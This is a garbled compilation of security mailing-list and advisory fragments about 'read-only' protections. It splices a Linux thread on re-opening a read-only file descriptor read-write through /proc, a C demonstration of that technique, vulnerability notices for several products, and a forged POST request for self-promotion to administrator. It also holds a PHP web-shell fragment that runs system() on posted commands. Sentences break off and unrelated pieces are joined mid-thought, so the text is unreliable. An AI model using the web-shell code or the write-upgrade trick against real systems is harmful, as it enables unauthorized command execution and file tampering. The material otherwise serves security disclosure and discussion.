And due to the fact that it's being presented in /proc as an fd, you treat it
as an fd, therefore your expectations do not match.
Your assumption is: because you accessed the world-writable file via a
read-only fd, you also expect the file to appear as read-only in /proc.
There is the mismatch.
The idea of /proc is to refer to files being opened by the process,
while RETAINING the original INODE attributes, regardless of the fact
Your assumption that the same file descriptor is being re-opened is
wrong!
The file descriptor retrieved via /proc is a new one. It is not the
same as the initial read-only one.
Do a strace on your test and you will see that the 'file descriptor'
in /proc will be accessed as an ordinary file. After checking the
directory permissions
fd as input to the nobody process.
So nobody is not opening /dir/file.txt (he can't, because he has no
access to it via /dir) but root is...
Therefore the write to the fd is failing, because you're passing a
read-only file descriptor.
Try to replay your scenario in separate shells, without the use of
sudo and redirection.
Best regards,
>
> I can do the example with fd passing and 700 directory, but it would
> be a lot of C code. Feel free to play, my example was not nearly the
> only way to demonstrate it, and no, it was not racy.
Here is an example that shows the behavior where a passed read-only fd
can become read-write by reopening it through /proc, when file
permissions allow it (but directory permissions do not):
$ sudo su
# mkdir -m 0700 /dir
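The following is an added, self-contained demonstration of the core behaviour argued about in this thread; it is not the poster's example above and not kernel code. It opens a scratch file O_RDONLY, then opens the /proc/self/fd/N entry of that descriptor with O_RDWR and writes through the result. It shows three things at once: write(2) on the original descriptor fails with EBADF, the original descriptor still reports O_RDONLY afterwards, and the descriptor obtained through /proc is a fresh open(2) on the underlying inode (the point made later in the thread that /proc/self/fd/X is not a dup()). Because it runs as one user on its own file, it does not reproduce the 0700-directory / fd-passing part of the thread (that needs root and a second user); it only shows why the re-open succeeds whenever the inode mode permits writing. The file name prefix and the helper names are assumptions of this example. Linux only; /proc must be mounted.

```c
/* Added example, not from the mailing-list thread: re-opening a read-only
 * fd read-write through /proc/self/fd/N.  Linux-only; /proc must be mounted. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Observations from one run. */
struct proc_fd_result {
    int  orig_write_errno;  /* errno from write() on the O_RDONLY fd (expect EBADF) */
    int  orig_flags_rdonly; /* fcntl(F_GETFL) still reports O_RDONLY afterwards   */
    int  reopen_ok;         /* open("/proc/self/fd/N", O_RDWR) succeeded            */
    int  reopen_write_ok;   /* write() through the re-opened fd succeeded          */
    char content[32];       /* file contents after the run                          */
};

/* Open `path` read-only, re-open that descriptor through /proc read-write,
 * and try to write `msg` through both.  Returns 0 on completion, -1 on setup error. */
int demo_proc_reopen(const char *path, const char *msg, struct proc_fd_result *r)
{
    memset(r, 0, sizeof *r);
    int ro = open(path, O_RDONLY);
    if (ro < 0) return -1;

    /* 1. The read-only open file description rejects writes (EBADF),
     *    independent of the inode's mode bits. */
    errno = 0;
    if (write(ro, msg, strlen(msg)) < 0) r->orig_write_errno = errno;

    /* 2. Open the /proc entry.  It looks like a symlink but resolves to the
     *    inode behind fd `ro`; this is an ordinary open(2) with its own access
     *    mode, checked against the inode (not against the directory path). */
    char procpath[64];
    snprintf(procpath, sizeof procpath, "/proc/self/fd/%d", ro);
    int rw = open(procpath, O_RDWR);
    if (rw >= 0) {
        r->reopen_ok = 1;
        if (write(rw, msg, strlen(msg)) == (ssize_t)strlen(msg)) r->reopen_write_ok = 1;
        close(rw);
    }

    /* 3. The original descriptor is unchanged: still O_RDONLY. */
    int fl = fcntl(ro, F_GETFL);
    r->orig_flags_rdonly = (fl >= 0 && (fl & O_ACCMODE) == O_RDONLY);
    close(ro);

    /* Read back what the file contains now. */
    int chk = open(path, O_RDONLY);
    if (chk < 0) return -1;
    ssize_t n = read(chk, r->content, sizeof r->content - 1);
    close(chk);
    if (n < 0) n = 0;
    r->content[n] = '\0';
    return 0;
}

/* Create a scratch file we own (mkstemp gives mode 0600, so the inode permits
 * our writes), run the demo against it, and remove it again. */
int run_demo(struct proc_fd_result *r)
{
    char path[] = "/tmp/procfd-demo-XXXXXX";   /* assumed scratch location */
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    close(fd);
    int rc = demo_proc_reopen(path, "owned", r);
    unlink(path);
    return rc;
}

/* 1 if every observation matches the behaviour described in the thread. */
int demo_all_expectations_hold(void)
{
    struct proc_fd_result r;
    if (run_demo(&r) != 0) return 0;
    return r.orig_write_errno == EBADF && r.orig_flags_rdonly &&
           r.reopen_ok && r.reopen_write_ok && strcmp(r.content, "owned") == 0;
}

int main(void)
{
    struct proc_fd_result r;
    if (run_demo(&r) != 0) { perror("demo setup"); return 1; }
    printf("write() on O_RDONLY fd     : errno %d (%s)\n", r.orig_write_errno, strerror(r.orig_write_errno));
    printf("open(/proc/self/fd/N, RDWR): %s\n", r.reopen_ok ? "succeeded" : "failed");
    printf("write() via re-opened fd   : %s\n", r.reopen_write_ok ? "succeeded" : "failed");
    printf("original fd still O_RDONLY : %s\n", r.orig_flags_rdonly ? "yes" : "no");
    printf("file now contains          : \"%s\"\n", r.content);
    return 0;
}
```

If the inode is not writable by the caller (say mode 0444 and a non-root user), the O_RDWR re-open fails with EACCES instead: the permission check is the inode's, which is exactly why a world-writable file in a 0700 directory is the interesting case in this thread.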
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContext
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
> > processes you do not own. Only ones you do (at least in a mainline kernel)
> > which is fair enough. This means that you can't have user a open a file
> > owned by user b and then let user c have access to it via
> > /proc/$pid/fd.
>
> No, but you can upgrade file from read-only to read-write using /proc.
Hmm.
$ cd test
$ echo moo >cow
and socket buffers are dependent on mbufs for their storage.
Data can be embedded directly in mbufs, or mbufs can instead reference
external buffers. The sendfile(2) system call uses external mbuf storage
to directly map the contents of a file into a chain of mbufs for
transmission purposes. The mbuf object supports a read-only flag that
must be honored to prevent modification or writes to buffer data in
cases like these.
II. Problem Description
several vulnerabilities
###########################################################
Ubuntu Privacy Remix (UPR), based on Ubuntu 9.04, is a live,
read-only CD that seals off your private data from the outside world to
offer protection against spying measures such as the German
„Bundestrojaner“, with which the German government and federal police
try to spy on its citizens.
UPR does this using encryption and isolation methods. This method of
booting off a read-only CD provides an isolated and unmodifiable system
UPR Security Notice UPRSN-08_02 December 22, 2008
###########################################################
Ubuntu Privacy Remix (UPR), based on Ubuntu 8.04 (LTS), is a live,
read-only CD that seals off your private data from the outside world. It
does this using encryption and isolation methods. This method of booting
off a read-only CD provides an isolated and unmodifiable system that is
exceedingly difficult to compromise by spyware.
The following security issues affect the "Ubuntu Privacy Remix" releases
prior 8.04_r2.
My bad.. :-( I presumed a re-use of the read-only FD, but that's not
the case.
I replayed it on a test-box and did some strace meanwhile and also
took a look at the sourcecode of kernel/fs/proc.
It seems that the /proc filedescriptor is directly referring to the file
inode
When creating this proc-entry the user guest did have access to the
On Tue 2009-10-27 21:19:19, Marco Verschuur wrote:
> My bad.. :-( I presumed a re-use of the read-only FD, but that's not
> the case.
>
> I replayed it on a test-box and did some strace meanwhile and also
> took a look at the sourcecode of kernel/fs/proc.
>
> It seems that the /proc filedescriptor is directly referring to the
> file inode
several vulnerabilities
###########################################################
The following security issues affect the "Ubuntu Privacy Remix" releases
prior 8.04_r1.
When a user connects to Quality Center, the cache folder is automatically updated with the latest VBScript workflow files. Those files are then read by the QC front-end only once for the whole session. They are then used by the application whenever the associated events are raised.
There are two main points that make this workflow highly vulnerable:
1. Those files are written in plain text;
2. Marking those files as read-only (through the file properties) will prevent Quality Center from overwriting them.
If a user modifies this file and then marks it as read-only, he can execute arbitrary code. As the OTA API allows access to the database, he can also modify the data stored in the database as follows:
* Quality Center 9.2 (Unconfirmed)
- Severity High: user has higher capability than defined by their profile
* Quality Center 9.0 Patch < 17
> Your assumption that the same file descriptor is being re-opened is
> wrong!
> The file descriptor retrieved via /proc is a new one. It is not the
> same as the
> initial read-only.
True, we were just being sloppy with the words. But it does not matter
one iota.
> As Martin Rex already explained yesterday, /proc is all virtual.
>
> The /proc/self/fd/X appears to be a symlink, but it is not; it
> operates on underlying objects directly. And IMNSHO it should honor
> restrictions opened filedescriptors have, like append-only or
> read-only.
/proc/self/fd/X is something virtual, not something real. It is
state as held by the kernel, it is not persisted anywhere.
The reason why it is visualized like a symlink is to provide clue
Privilege Escalation Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Three privilege escalation vulnerabilities exist in the Cisco WLCs
that could allow an authenticated attacker with read-only privileges
to modify the device configuration.
These vulnerabilities are documented in Cisco Bug IDs CSCtc91431,
CSCsz66726, and CSCtc93837; and have been assigned
CVE IDs CVE-2010-2842, CVE-2010-2843, and CVE-2010-3033.
> On 24.10.2009 1:56, Pavel Machek wrote:
> >a) this kind of hardlink does not exist when /proc is mounted (and on
> >non-Linux)
> >(and c) writing to file descriptor opened read-only is bad).
> Did you think of creating a hardlink to the file in an unrestricted
> location?
Pavel considered that in his original mail, where he checked there were
> http://www.w3.org/TR/REC-DOM-Level-1/level-one-html.html
> ------------------------------------------------------
> readonly attribute long length;
> ------------------------------------------------------
That was DOM Level 1 (1999). Even level 2 (2000) has this as read-write:
http://www.w3.org/TR/DOM-Level-2-HTML/html.html#ID-94282980
Also keep in mind that with relatively few exceptions, W3C simply
Therefore a user with even the lowest level of access (i.e. without any role configured) is able to promote himself to administrator
and/or change other users' roles and account parameters at will.
Depending on the role or roles initially configured for this user, the user management page may not be visible
in the interface's layout; however, the underlying script itself is still reachable and can be invoked "by hand".
Let's now consider a malicious operator named 'foobar' whose role has been restricted to "Event analyst (read only)".
He would first log in to the appliance using his own credentials in order to get an authenticated session cookie (CGISESSID=xxxxxxxxxxxxxxxxxx)
then he could send a forged POST request similar to the one below:
POST https://x.x.x.x/admin/user/user.cgi HTTP/1.1
User-Agent: xxxxxx
Hi Michal,
Interesting,
http://www.w3.org/TR/REC-DOM-Level-1/level-one-html.html
------------------------------------------------------
readonly attribute long length;
------------------------------------------------------
MZ> Does not seem to be the case in HTML5 at least?
There must have been a change then between HTML4 and HTML5
> (which is a sensible implementation and what the kernel seems
> to be currently doing), or implement it as a dup() and transfer
> of the filedescriptor. (Transferring open filedescriptors between
> processes can also be done by IPC). Implementing it via dup()
> would probably keep the original filedescriptor attributes
> (such as read-only) but would require an entirely separate
> approach to access control (who is allowed to dup() that filedescriptor),
> and it would create problems: like you would not be able to look
> into files that were opened only for write through /proc, which
> would seriously impair the usefulness of the fd-listing in /proc.
+-------
IronPort C-Series, X-Series, and M-Series appliances utilize code
covered by this advisory, but are not susceptible to any security
risk. IronPort C-Series, X-Series, and M-Series incorporate the
libraries under the advisory to provide anonymous read-only access to
system health data. There is no risk of escalated authorization
privileges allowing a 3rd party to make any configuration changes to
the IronPort devices. IronPort S-Series and Encryption Appliances are
not affected by this advisory. This announcement has also been posted
on the IronPort Support Portal, available to IronPort customers:
> processes you do not own. Only ones you do (at least in a mainline kernel)
> which is fair enough. This means that you can't have user a open a file
> owned by user b and then let user c have access to it via
> /proc/$pid/fd.
No, but you can upgrade file from read-only to read-write using /proc.
Pavel
--
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";
if ($_POST['command'] ) {
if ($execfunc=="system") {
system($_POST['command']);
The ext4_decode_error function in fs/ext4/super.c in the ext4
filesystem in the Linux kernel before 2.6.32 allows user-assisted
remote attackers to cause a denial of service (NULL pointer
dereference), and possibly have unspecified other impact, via a
crafted read-only filesystem that lacks a journal. (CVE-2009-4308)
The eisa_eeprom_read function in the parisc isa-eeprom component
(drivers/parisc/eisa_eeprom.c) in the Linux kernel before 2.6.31-rc6
allows local users to access restricted memory via a negative ppos
argument, which bypasses a check that assumes that ppos is positive
> ... another solution -- allow fcntl() to remove read-only and
> append-only limitations, so that behaviour is at least explicit.
Do not lower security, just to emulate /proc sloppiness. (That would be
like fixing a root security bug by doing away with the root password.)
Is there anything (currently) relying on that security?
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
> into the web browser. [...]
> In order to optimize the interaction speed of the application, a cache
> folder is created on the client machine. [...] Indeed, those files are
> required on the client machine because the workflow is executed on the
> client, not on the server. [...]
> If a user modifies this file and then marks it as read-only, he can
> execute arbitrary code. As the OTA API allows access to the database, he
> can also modify the data stored in the database as follows:
You say you can execute arbitrary code on your computer (under your own
account)? What an amazing exploit! (pun intended)